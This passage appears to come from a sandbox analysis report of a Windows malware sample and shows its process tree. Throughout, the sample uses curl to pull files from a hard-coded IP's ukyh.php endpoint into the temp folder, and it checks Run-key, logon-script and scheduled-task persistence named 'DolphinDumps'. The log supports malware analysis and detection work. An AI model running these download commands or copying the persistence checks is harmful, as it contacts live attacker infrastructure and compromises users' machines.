        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vthau" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:3820
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vthau" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lgdab" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3492
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lgdab" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3248
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xdvel" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3904
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xdvel" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wubuc" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        
        PID:3088
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wubuc" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:1892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mnkio" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2396
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mnkio" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zyheb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:884
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zyheb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xtubq" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        5⤵
        
        PID:220
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xtubq" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        6⤵
        
        PID:792
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2396
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2216
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4676
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zlvbt" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:236
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zlvbt" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zfisq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:1212
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zfisq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:212
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:232
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:5036
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2584
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3668
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lanjr" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3824
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lanjr" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\skmiy" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:1460
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\skmiy" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:4588
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2352
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3904
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1680
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nxclz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4972
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nxclz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1148
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fauul" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4572
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fauul" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:1092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1392
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4588
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4956
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uwnzo" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3508
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uwnzo" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4404
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lcltd" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:4156
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lcltd" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:2080
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4452
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4792
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1560
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jibej" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1452
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jibej" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qflll" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1340
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qflll" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pxiae" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3536
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pxiae" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4444
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3996
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:5068
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3520
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2316
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\togef" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3228
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\togef" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wwfps" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4944
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wwfps" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\atoua" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1712
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\atoua" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3268
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:180
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2788
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mkvyc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:744
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mkvyc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yoota" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4956
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\yoota" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\plkct" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4264
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\plkct" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2488
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4572
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4416
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2732
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:5064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\phyii" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4996
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\phyii" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zcekt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3148
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zcekt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\htosb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\htosb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1880
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3644
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4812
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2536
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\awqno" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3000
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\awqno" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4664
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sscpi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1364
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sscpi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4356
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spluk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4672
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\spluk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1712
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4924
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:796
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wlzgs" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4732
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wlzgs" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4136
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fqmtp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4012
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fqmtp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\psjox" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4060
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\psjox" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3544
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:5088
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4580
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3488
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dwxvm" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2500
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dwxvm" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4532
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uydpg" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4960
      - C:\Windows\SysWOW64\curl.exe
        
